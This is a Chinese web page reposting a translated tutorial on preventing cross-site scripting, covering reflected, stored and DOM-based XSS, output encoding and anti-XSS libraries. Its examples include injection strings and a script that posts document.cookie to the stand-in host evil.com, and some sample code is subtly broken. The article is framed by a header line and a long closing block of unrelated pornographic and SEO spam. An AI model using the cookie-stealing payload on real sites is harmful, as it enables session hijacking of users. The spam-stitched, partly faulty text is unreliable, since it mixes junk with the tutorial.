精品欧美一区二区三区在线观看 _久久久久国色av免费观看性色_国产精品久久在线观看_亚洲第一综合网站_91精品又粗又猛又爽_小泽玛利亚一区二区免费_91亚洲精品国偷拍自产在线观看 _久久精品视频在线播放_美女精品久久久_欧美日韩国产成人在线

如何防止跨站點腳本攻擊

安全 應用安全
跨站點腳本(XSS)是當前web應用中最危險和最普遍的漏洞之一。安全研究人員在大部分最受歡迎的網站,包括Google, Facebook, Amazon, PayPal等網站都發現這個漏洞。如果你密切關注bug賞金計劃,會發現報道最多的問題屬于XSS。

1. 簡介

跨站點腳本(XSS)是當前web應用中最危險和最普遍的漏洞之一。安全研究人員在大部分最受歡迎的網站,包括Google, Facebook, Amazon, PayPal等網站都發現這個漏洞。如果你密切關注bug賞金計劃,會發現報道最多的問題屬于XSS。為了避免跨站腳本,瀏覽器也有自己的過濾器,但安全研究人員總是能夠設法繞過這些過濾器。

這種漏洞(XSS)通常用于發動cookie竊取、惡意軟件傳播(蠕蟲攻擊),會話劫持,惡意重定向。在這種攻擊中,攻擊者將惡意JavaScript代碼注入到網站頁面中,這樣”受害”者的瀏覽器就會執行攻擊者編寫的惡意腳本。這種漏洞容易找到,但很難修補。這就是為什么你可以在任何網站發現它的身影。

在這篇文章中,我們將看到跨站腳本攻擊是什么以及如何創建一個過濾器來阻止它。我們還將看到幾個開源庫,將幫助你修補在web應用程序中的跨站腳本漏洞。

2. 跨站點腳本是什么?

跨站點腳本攻擊是一種Web應用程序的攻擊,攻擊者嘗試注入惡意腳本代碼到受信任的網站上執行惡意操作。 在跨站點腳本攻擊中,惡意代碼在受影響用戶的瀏覽器端執行,并對用戶的影響。也被稱為XSS攻擊。你可能有一個疑問就是為什么我們叫它”XSS”,而不是”CSS”。

對于廣大的web程序猿來說。在網頁設計中,我們已經把級聯樣式表叫做CSS。因此為了避免混淆,我們把cross-site scripting稱為XSS。

現在,讓我們回到XSS攻擊。這個漏洞發生在網站應用程序接收用戶的輸入數據卻沒有做必要的編碼。如果對用戶輸入的數據沒有進行正確的編碼和過濾,這個被注入惡意腳本將被發送給其他用戶。 對瀏覽器來說,它沒有辦法知道它不應該相信一個腳本的合法性。瀏覽器會正常地把這個腳本當成普通腳本執行,這個時候惡意的操作就不可避免的發生了。大部分的時候,XSS是用來竊取cookie,或竊取有效用戶的會話令牌session,以此進行會話劫持。#p#

3. XSS的演示

Example 1:

幾乎所有的網站上看到一個搜索框。有了這個搜索框,你可以搜索并找到在網站上存放的資料。這種搜索形式看起來像這樣

<form action="search.php" method="get">
    <input type="text" name="q" value="" />
    <input type="submit" value="send" />
</form>

 

如何防止跨站點腳本攻擊

在search.php頁面中,代碼顯示了搜索的結果,并且列出了用戶輸入的搜索關鍵字。形式如下:

“Search results for Keyword”或者”You Searched for Keyword”

search.php可以這么寫來模擬功能:

<h3>You Searched for: <?php echo($_GET['q']); ?>

 

如何防止跨站點腳本攻擊

無論你輸入任何關鍵字,它將隨搜索結果一起被顯示在網頁上?,F在想想會發生什么,如果一個攻擊者試圖從這個地方注入以下惡意腳本。

<script>alert('XSS injection')</script>

 

如何防止跨站點腳本攻擊

可以看到,因為缺少對用戶輸入的有效的”編碼”和”過濾”。導致了XSS攻擊的發生,其實從本質上理解,XSS就是一種HTML的注入,和傳統的buffer overflow是類似的思想,即沒有對數據和代碼進行有效的分離,在緩沖區溢出總,攻擊者在通過超長的數據包發送覆蓋了程序buffer的關鍵返回ret位置,導致CPU控制流的劫持,錯誤地把攻擊者數據當作代碼來執行,最后導致了緩沖區溢出。

而XSS中的HTML注入也是一種利用代碼和數據未有效分離的攻擊,只不過攻擊發生在受害者用戶的瀏覽器上,攻擊者將數據發送給服務器,服務器沒有對輸入的數據進行有效的”編碼”和”過濾”(即去除數據本身的代碼特性,對于HTML來說就是去除它們稱為Tag標簽的可能),導致了這些數據在用戶的瀏覽器上得到執行,最終導致XSS攻擊的發生。

Example 2:

很多網站都有私信或者留言板功能。登錄用戶可以發表評論或者給其他用戶(包括管理員)發送私信。一個最簡單的模擬表單如下:

<form action="sendmessage.php" method="post'">
    <textarea name="message"> </textarea>
    <input type="submit" value="send" />
</form>

當用戶點擊發送時,這條消息會被保存在數據庫中指定的數據表中,另一個用戶當打開這條消息的時候將看到發送的內容。但是,如果一個惡意攻擊者發送的內容包含了一些javascript代碼,這些代碼用于偷取敏感的cookie信息。當用戶打開看到這條消息的時候,惡意的javascript代碼就會得到執行,造成敏感cookie信息泄漏。攻擊者可以利用獲得這些cookie信息進行session hijacking會話劫持,直接以合法用戶的身份登錄其他用戶的賬戶。

惡意攻擊者可以在消息框中加入一下javascript代碼:

var url = "http://www.evil.com/index.php";   //攻擊者控制的服務器
var postStr = "ck=" + document.cookie;
var ajax = null;
if(window.XMLHttpRequest())
{
    ajax = new XMLHttpRequest();
}
else if(window.ActiveXObject)
{
    ajax = new ActiveXObject("Microsoft.XMLHttp");
}
else
{
    return;
}
ajax.open("POST", url, true);
ajax.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
ajax.send(postStr);
ajax.onreadystatechange = function()
{
    if(ajax.readyState == 4 && ajax.status == 200)
    {
        //alert("Done!");
    }
}

通過AJAX異步請求,將被攻擊者的敏感cookie信息發送給了攻擊者控制的服務器。攻擊者隨后即可利用這些cookie信息以”合法”用戶的身份進行登錄操作。

這里首先要理清楚幾個重要的問題:

1. cookie的作用

Cookie,有時也用其復數形式Cookies,指某些網站為了辨別用戶身份、進行session跟蹤而儲存在用戶本地終端上的數據(通常經過加密)。定義于RFC2109(已廢棄),最新取代的規范是RFC2965。

也就是說,cookie是用戶和服務器之間的橋梁。服務器可以使用session來保存用戶的身份信息(ID,購物車等),但是需要用戶在訪問網頁(發送HTTP數據包)的時候附帶上相應的cookie,通過cookie中的特定值來識別sessionID,才能把單獨用戶和單獨的session聯系起來。cookie是有狀態HTTP交互的一種重要機制。

2. 瀏覽器的同源策略

在進行cookie竊取的時候,攻擊者偷取的cookie是什么,是全部cookie,還是當前這個網站的cookie?要解決這個問題,我們要先了解一些瀏覽器的同源策略。

同源策略,它是由Netscape提出的一個著名的安全策略。
現在所有支持JavaScript 的瀏覽器都會使用這個策略。
所謂同源是指,域名,協議,端口相同。
當一個瀏覽器的兩個tab頁中分別打開來 百度和谷歌的頁面
當瀏覽器的百度tab頁執行一個腳本的時候會檢查這個腳本是屬于哪個頁面的,
即檢查是否同源,只有和百度同源的腳本才會被執行。

同源策略(Same Origin Policy)是一種約定,它是瀏覽器最核心也是最基本的安全功能,如果缺少了同源策略,則瀏覽器的正常功能可能都會受到影響??梢哉fweb是構建在同源策略的基礎之上的,瀏覽器只是針對同源策略的一種實現。

瀏覽器的同源策略限制了來自不同源的”document”或腳本,對當前”document”的讀取或者設置某些屬性。為了不讓瀏覽器的頁面行為發生混亂,瀏覽器提出了”Origin”(源)這以概念,來自不同的Origin的對象無法互相干擾。

因為同源策略的原因,也就導致了我們的XSS Payload(XSS攻擊代碼)必須在我們希望攻擊的同一個域下觸發。例如攻擊者如果想竊取在www.a.com下的cookie,那就必須在www.a.com這個域(可以是不同頁面,但要保證是同一個域)下的的某一個頁面放置XSS代碼,可以是存儲型,也可以是反射型或DOM Baesd型的。#p#

4. XSS攻擊的種類

對XSS的分類沒有明確的標準,但業界普遍將XSS攻擊分為三類。反射型XSS(non-persistent XSS), 存儲型XSS(persistent XSS), DOM Based XSS

4.1 非持久性跨站點腳本攻擊

非持久性XSS也稱為反射型跨站漏洞。它是最常見的類型的XSS。漏洞產生的原因是攻擊者注入的數據反映在響應中。如果你看了我們上面所示的例子,第一個例子是一個非持久的XSS攻擊。一個典型的非持久性XSS包含一個帶XSS攻擊向量的鏈接(即每次攻擊需要用戶的點擊)。

4.2 持久的跨站點腳本攻擊

持久型跨站點腳本也稱為存儲跨站點腳本。它一般發生在XSS攻擊向量(一般指XSS攻擊代碼)存儲在網站數據庫,當一個頁面被用戶打開的時候執行。每當用戶打開瀏覽器,腳本執行。在上面的示例中,第二個例子就展示了一個持久的XSS攻擊。持久的XSS相比非持久性XSS攻擊危害性更大,因為每當用戶打開頁面,查看內容時腳本將自動執行。谷歌的orkut曾經就遭受到XSS。

4.3 基于dom的跨站點腳本攻擊

基于DOM的XSS有時也稱為type0 XSS。當用戶能夠通過交互修改瀏覽器頁面中的DOM(Document Object Model)并顯示在瀏覽器上時,就有可能產生這種漏洞,從效果上來說它也是反射型XSS。

通過修改頁面的DOM節點形成的XSS,稱之為DOM Based XSS。

 
<script>
    function test()
    {
        var str = document.getElementById("text").value;
        document.getElementById("t").innerHTML = "<a href='" + str + "' >testLink</a>";
    }
</script>
<div id="t"></div>
<input type="text" id="text" value="" />
<input type="button" id="s" value="write" onclick="test()" />

在這個場景中,代碼修改了頁面的DOM節點,通過innerHTML把一段用戶數據當作HTML寫入到頁面中,這就造成了DOM Based XSS

' onclick=alert(/xss/) '

輸入后,頁面代碼就變成了:

<a href='' onclick=alert(/xss/) '' >testLink</a>

點擊這個新生成的鏈接,腳本將被執行。

實際上,這里還有另外一種利用方式—除了構造一個新事件外,還可以選擇閉合掉標簽,并插入一個新的HTML標簽:

'><img src=# onerror=alert(/xss2/) /><'

頁面代碼變成了:

<a href=''><img src=# onerror=alert(/xss2/) /><'' >testLink</a>

#p#

5. XSS漏洞產生的原因

跨站點腳本的主要原因是程序猿對用戶的信任。開發人員輕松地認為用戶永遠不會試圖執行什么出格的事情,所以他們創建應用程序,卻沒有使用任何額外的代碼來過濾用戶輸入以阻止任何惡意活動。另一個原因是,這種攻擊有許多變體,用制造出一種行之有效的XSS過濾器是一件比較困難的事情。

但是這只是相對的,對用戶輸入數據的”編碼”和”過濾”在任何時候都是很重要的,我們必須采取一些針對性的手段對其進行防御。

6. 如何創造一個良好的XSS過濾器來阻止大多數XSS攻擊代碼

6.1 需要重點”編碼”和”過濾”的對象

The URL
HTTP referrer objects
GET parameters from a form
POST parameters from a form
Window.location
Document.referrer
document.location
document.URL
document.URLUnencoded
cookie data
headers data
database data

防御XSS有一個原則:

以當前的應用系統為中心,所有的進入應用系統的數據都看成是輸入數據(包括從FORM表單或者從數據庫獲取到的數據),所有從當前應用系統流出的數據都看作是輸出(包括輸出到用戶瀏覽器或向數據庫寫入數據)

對輸入的數據進行”過濾”,對輸出數據進行”編碼”。這里的”編碼”也要注意,必須針對數據具體的上下文語境進行針對性的編碼。例如數據是輸出到HTML中的那就要進行HtmlEncode,如果數據是輸出到javascript代碼中進行拼接的,那就要進行javascriptEncode。

如果不搞清楚數據具體輸出的語境,就有可能因為HtmlParser()和javascriptParser()兩種解析引擎的執行先后問題導致看似嚴密的”編碼”形同虛設。

6.2 HtmlEncode HTML編碼

它的作用是將字符轉換成HTMLEntities,對應的標準是ISO-8859-1

為了對抗XSS,在HtmlEncode中要求至少轉換以下字符:

&   -->   &amp;
<   -->   &lt;
>   -->   &gt;
"   -->   &quot;
'   -->   '
/   -->   /
在PHP中:

htmlentities

http://www.w3school.com.cn/php/func_string_htmlentities.asp

htmlspecialchars

http://www.w3school.com.cn/php/func_string_htmlspecialchars.asp

6.3 javascriptEncode javascript”編碼”

javascriptEncode與HtmlEncode的編碼方法不同,HtmlEncode是去編碼,而javascriptEncode更多的像轉義,它需要使用”\”對特殊字符進行轉義。從原理上來講,這都符合編碼函數的一個大原則: 將數據和代碼區分開,因為對于HTML Tag來說,我們對其進行”可視化(轉換成可以見字符)”的編碼可以將數據和HTML的界限分開。而對于javascript來說,我們除了要進行編碼之外,還需要對特殊字符進行轉義,這樣攻擊輸入的用于”閉合”的特殊字符就無法發揮作用,從而避免XSS攻擊,除此之外,在對抗XSS時,還要求輸出的變量必須在引號內部,以避免造成安全問題。

escape()

http://www.w3school.com.cn/js/jsref_escape.asp

該方法不會對 ASCII 字母和數字進行編碼,也不會對下面這些 ASCII 標點符號進行編碼: * @ – _ + . / 。其他所有的字符都會被轉義序列(十六進制\xHH)替換。

利用這個編碼函數,不僅能防御XSS攻擊,還可以防御一些command注入。

7. 一些開源的防御XSS攻擊的代碼庫

PHP AntiXSS
這是一個不錯的PHP庫,可以幫助開發人員增加一層保護,防止跨站腳本漏洞。
https://code.google.com/p/php-antixss/
xss_clean.php filter
https://gist.github.com/mbijon/1098477
HTML Purifier
http://htmlpurifier.org/
xssprotect
https://code.google.com/p/xssprotect/
XSS HTML Filter
http://finn-no.github.io/xss-html-filter/

原文地址:http://resources.infosecinstitute.com/how-to-prevent-cross-site-scripting-attacks/

責任編輯:藍雨淚 來源: FreebuF
相關推薦

2010-10-12 13:25:55

2010-01-25 10:16:49

2020-12-21 09:40:06

腳本攻擊XSS漏洞

2012-11-15 09:51:36

2010-05-04 22:47:09

2012-12-10 10:32:22

2022-08-12 07:01:00

Node.jsXSS腳本

2024-04-10 12:07:09

2025-04-27 01:32:23

2013-01-17 09:39:17

2023-06-01 15:30:21

2019-01-11 14:45:30

2010-06-07 20:19:49

2013-01-11 17:33:46

2010-09-25 14:34:09

2011-12-03 20:25:53

2011-10-14 09:23:14

2010-08-24 11:24:35

2010-06-30 16:26:05

2023-08-04 00:08:03

點贊
收藏

51CTO技術棧公眾號

38少妇精品导航| 欧美精品v日韩精品v韩国精品v| 91精品国产99久久久久久红楼| 黄色一级片中国| 福利欧美精品在线| 日韩欧美在线视频免费观看| 久久天天狠狠| 97人妻精品一区二区三区视频 | 欧美成人国产一区二区| 久久精品国产sm调教网站演员| 色视频在线观看免费| 久久99久久精品欧美| 欧美激情性做爰免费视频| 女~淫辱の触手3d动漫| 不卡精品视频| 动漫精品一区二区| 午夜久久久久久久久久久| 手机看片一区二区三区| 紧缚奴在线一区二区三区| 97高清免费视频| 99久久99久久精品国产| 中文字幕伦av一区二区邻居| 欧美一区二区三区日韩视频| 蜜臀久久99精品久久久酒店新书| av免费在线观看网址| 国产欧美一区二区精品仙草咪| 91九色蝌蚪成人| 中文字幕二区三区| 国产一区二区高清| 欧美激情免费观看| 天天做夜夜爱爱爱| 教室别恋欧美无删减版| 亚洲成人精品视频| 国产探花在线观看视频| 另类中文字幕国产精品| 亚洲国产日韩a在线播放| 久久av喷吹av高潮av| 国内在线精品| 91麻豆成人久久精品二区三区| 147欧美人体大胆444| 在线观看国产黄| 欧美中文日韩| 91高潮精品免费porn| 麻豆一区二区三区精品视频| 久久久久久久久99精品大| 国产亚洲精品久久久久久777| 国产原创剧情av| 国产精一区二区| 欧美区在线观看| 日本特黄a级片| 欧美粗大gay| 欧美日韩午夜视频在线观看| www.射射射| 四季久久免费一区二区三区四区| 亚洲婷婷在线视频| 国产手机视频在线观看| 成人在线影视| 一区二区视频在线| 久久综合亚洲精品| 青春草视频在线| 亚洲成va人在线观看| 农民人伦一区二区三区| av在线加勒比| 精品日韩中文字幕| 黑人糟蹋人妻hd中文字幕| 英国三级经典在线观看| 一本到不卡精品视频在线观看| 午夜精品久久久久久99热| aaa级精品久久久国产片| 国产视频第一页| 国产久卡久卡久卡久卡视频精品| 91亚洲精品久久久久久久久久久久| 一区不卡在线观看| 久久99国产精品尤物| 成人在线免费观看视视频| 国产又粗又大又黄| 国产精品主播直播| 好看的日韩精品| 每日更新av在线播放| 久久久久国产精品人| 亚洲 日韩 国产第一区| 日本a在线播放| 亚洲黄色片在线观看| 少妇人妻大乳在线视频| 日韩大尺度黄色| 欧美精品色一区二区三区| 中文字幕第10页| 欧美电影在线观看完整版| 国产香蕉97碰碰久久人人| 91狠狠综合久久久| 黄色免费成人| 国产精品扒开腿做爽爽爽的视频| 一本色道久久综合熟妇| 高潮精品一区videoshd| 久久草视频在线看| 中文字幕日本在线观看| 亚洲综合免费观看高清完整版 | 欧美日韩大陆在线| 奇米777在线视频| 久久久久97| 在线观看精品国产视频| 欧美日韩精品亚洲精品| 久久精品综合| 51国偷自产一区二区三区| 天堂а√在线8种子蜜桃视频| 久久久久久久久蜜桃| 91社在线播放| 免费看av不卡| 日韩欧美久久久| 波多野吉衣中文字幕| 一个色综合网| 日韩av电影国产| 亚洲av无码国产综合专区| 久久久国产一区二区三区四区小说 | 久久国产精品久久久久| 特级做a爱片免费69| 国产在线不卡一区| 日韩一区二区电影在线观看| 91豆花视频在线播放| 欧美视频日韩视频| 亚洲av无码一区二区三区观看| 99热在线成人| 国产精品69久久久久| 亚洲精品视频91| 国产精品乱人伦| av免费中文字幕| 风间由美中文字幕在线看视频国产欧美 | 国产一级在线| 亚洲成人手机在线| 性欧美在线视频| 国产精品嫩草影院在线看| 欧美精品xxx| 99久久精品免费看国产交换| 欧美激情在线一区二区三区| 国产午夜福利视频在线观看| 狠狠一区二区三区| 欧美成人中文字幕| 91精品国产乱码久久| 欧美激情一区二区三区在线| 美女福利视频在线| 日韩有码av| 97在线视频精品| 国模私拍视频在线| 亚洲曰韩产成在线| 日韩精品视频网址| 91成人免费| 91色精品视频在线| 久久亚洲天堂| 91精品国产全国免费观看| 999福利视频| 久久成人久久爱| 中文字幕人成一区| 欧美97人人模人人爽人人喊视频| 在线看片第一页欧美| 国产成人精品亚洲| 国产精品久久久久婷婷| 日本免费色视频| 婷婷综合五月| 亚洲最大成人在线| 色呦呦网站在线观看| 精品久久一区二区三区| 免费在线黄色片| k8久久久一区二区三区| 99热自拍偷拍| 你微笑时很美电视剧整集高清不卡| 欧美综合国产精品久久丁香| 免费黄色在线视频网站| 在线看日本不卡| 五月天免费网站| 国产精品99久久久久久久女警 | 91.成人天堂一区| 国产中文字幕久久| 国产精品性做久久久久久| 黄色一级片国产| 亚欧日韩另类中文欧美| 国产精品久久久av| 天天影视久久综合| 日韩三级中文字幕| 久久艹免费视频| 久久精品一区二区三区不卡牛牛 | 成人午夜视频免费看| 国产一区二区在线视频播放| 国产精品一区二区三区av麻| 国产日韩欧美视频| 污污的网站在线免费观看| 亚洲国产日韩精品在线| 亚洲永久精品一区| 亚洲人成伊人成综合网小说| 国产人妻黑人一区二区三区| 久久精选视频| 欧美 亚洲 视频| 伊人精品一区| 91九色国产视频| 岛国av在线网站| 中文字幕日韩免费视频| 亚洲经典一区二区三区| 色综合久久久久综合体| 欧美视频www| 92国产精品观看| 亚洲最大天堂网| 亚洲九九精品| 中文字幕在线亚洲精品| 欧美有码在线| 91久久精品日日躁夜夜躁国产| 国产伦理精品| 久久午夜a级毛片| 你懂的在线看| 亚洲成人在线视频播放| 伊人色综合久久久| 亚洲va欧美va人人爽午夜| 国产又粗又长免费视频| 成人激情黄色小说| 波多野结衣xxxx| 今天的高清视频免费播放成人| 四虎永久国产精品| 欧美久久精品| 高清不卡一区二区三区| 欧洲亚洲精品久久久久| 日本精品久久久久影院| 2024短剧网剧在线观看| 中文字幕亚洲一区在线观看| 无套内谢的新婚少妇国语播放| 欧美一级欧美一级在线播放| 中文字幕免费高清在线观看| 欧美日韩精品在线| 免费一级全黄少妇性色生活片| 国产精品污网站| 高潮毛片无遮挡| 91丨porny丨首页| 女性生殖扒开酷刑vk| 国产麻豆91精品| 日本黄大片一区二区三区| 丝袜美腿高跟呻吟高潮一区| 日韩精品―中文字幕| 欧美日韩免费观看一区=区三区| 在线观看免费91| 成人激情电影在线| 日本一区精品| 久久99国产成人小视频| 久久综合九色99| 欧美三级自拍| 激情视频在线观看一区二区三区| 日本伊人久久| 亚洲伊人第一页| 嫩呦国产一区二区三区av| 成人国产精品日本在线| 先锋影音一区二区| 国产精品揄拍500视频| 成人黄色免费观看| 国产精品久久久久久久久久尿| 朝桐光一区二区| 日本三级韩国三级久久| 影视一区二区三区| 国产精品久久中文| 免费视频观看成人| 91在线观看免费| 亚洲国产aⅴ精品一区二区| 91中文字精品一区二区| 伊人www22综合色| 国产日韩欧美精品| 欧美理论电影在线精品| 欧美xxxx黑人又粗又长精品| 啄木系列成人av电影| 日韩国产在线一区| 99欧美视频| avav在线播放| 亚洲乱亚洲高清| 国产真实乱子伦| 青青草国产精品亚洲专区无| 免费一区二区三区在线观看| 激情综合色综合久久综合| 中文字幕av一区二区三区人妻少妇| 高清shemale亚洲人妖| 亚洲av片不卡无码久久| 国产欧美一区二区三区沐欲| 欧美风情第一页| 亚洲国产日韩在线一区模特| 午夜影院免费在线观看| 欧美日韩免费高清一区色橹橹| 国产精品亚洲欧美在线播放| 精品久久久久久久久久久久久久久久久 | 亚洲欧美偷拍三级| 成人黄色一级大片| 国产黄色精品视频| 国产ts丝袜人妖系列视频 | 日韩免费一区二区三区在线播放| 韩国av在线免费观看| 亚洲欧美日韩中文视频| 国产三级在线播放| 97色在线视频观看| 国产精品久久久久久久久久齐齐| 亚洲aa中文字幕| 日韩超碰人人爽人人做人人添| 日韩国产一区久久| 精品动漫3d一区二区三区免费| 亚洲人成无码www久久久| 国产一区二区在线观看视频| 国产精品无码一区二区三区免费| 国产精品欧美久久久久一区二区| 久久精品国产亚洲av麻豆色欲| 色老头久久综合| 国内毛片毛片毛片毛片| 亚洲免费视频网站| 欧美xxxx免费虐| 国产精品日韩在线观看| 99re热精品视频| 一本色道久久综合亚洲二区三区| 在线看片成人| 日本高清一区二区视频| 久久―日本道色综合久久 | 色哟哟亚洲精品| 精品免费久久久| 爽爽爽爽爽爽爽成人免费观看| 成人女同在线观看| 成人亲热视频网站| 国产亚洲一卡2卡3卡4卡新区 | 日韩三级在线观看| 国产对白叫床清晰在线播放| 欧美极品少妇xxxxⅹ喷水| 日本久久二区| 日韩av影视| 国产亚洲永久域名| 中文字幕制服丝袜| 成人欧美一区二区三区1314| 亚洲av人无码激艳猛片服务器| 日韩高清av在线| 中文字幕有码在线视频| 国产乱肥老妇国产一区二| 免费成人av| 黄色动漫网站入口| 成人毛片视频在线观看| 国产大学生自拍| 777亚洲妇女| 69久久精品| 国产精品久久久久久久av电影| 亚洲自拍都市欧美小说| 亚洲国产精品无码观看久久| 国产一区在线看| 2025国产精品自拍| 5566中文字幕一区二区电影| 亚洲图片88| 国产九九精品视频| 日韩毛片视频| 中文字幕在线综合| 国产精品久线在线观看| 中文字幕av影视| 日韩中文字幕在线视频播放| 高清亚洲高清| 永久免费在线看片视频| 国精产品一区一区三区mba视频| 五月婷婷综合激情网| 欧美日韩高清一区| 日本暖暖在线视频| 成人av.网址在线网站| 欧美肥老太太性生活| 校园春色 亚洲色图| 国产精品素人一区二区| 超碰在线97观看| 伊人久久综合97精品| 欧美成人aaa| av不卡在线免费观看| 国产精品自拍一区| 唐朝av高清盛宴| 欧美大片在线观看一区| 岛国av在线网站| 欧美一区三区二区在线观看| 日韩二区在线观看| 久久久久人妻一区精品色| 91精品国产综合久久久久| 伦理在线一区| 麻豆91蜜桃| 美女一区二区三区在线观看| 成人自拍小视频| 亚洲精品在线观| 桃色av一区二区| 亚洲午夜精品福利| 床上的激情91.| 亚洲免费在线视频观看| 在线不卡国产精品| 秋霞午夜一区二区三区视频| 久久久久久久午夜| 国产精品无圣光一区二区| 午夜精品一二三区| 日本午夜人人精品| 国产精品久久久久无码av| 中文字幕视频观看| 色综合网站在线| 成人免费看片| 久久一区二区精品| 久99久精品视频免费观看| 日韩精品在线免费看| 一区二区三区久久精品| 久久久久毛片免费观看| 国产99久久九九精品无码| 亚洲欧洲精品天堂一级| 亚洲 欧美 激情 另类| 成人午夜在线观看| 日韩午夜黄色| 国产免费美女视频| 亚洲乱码国产乱码精品精|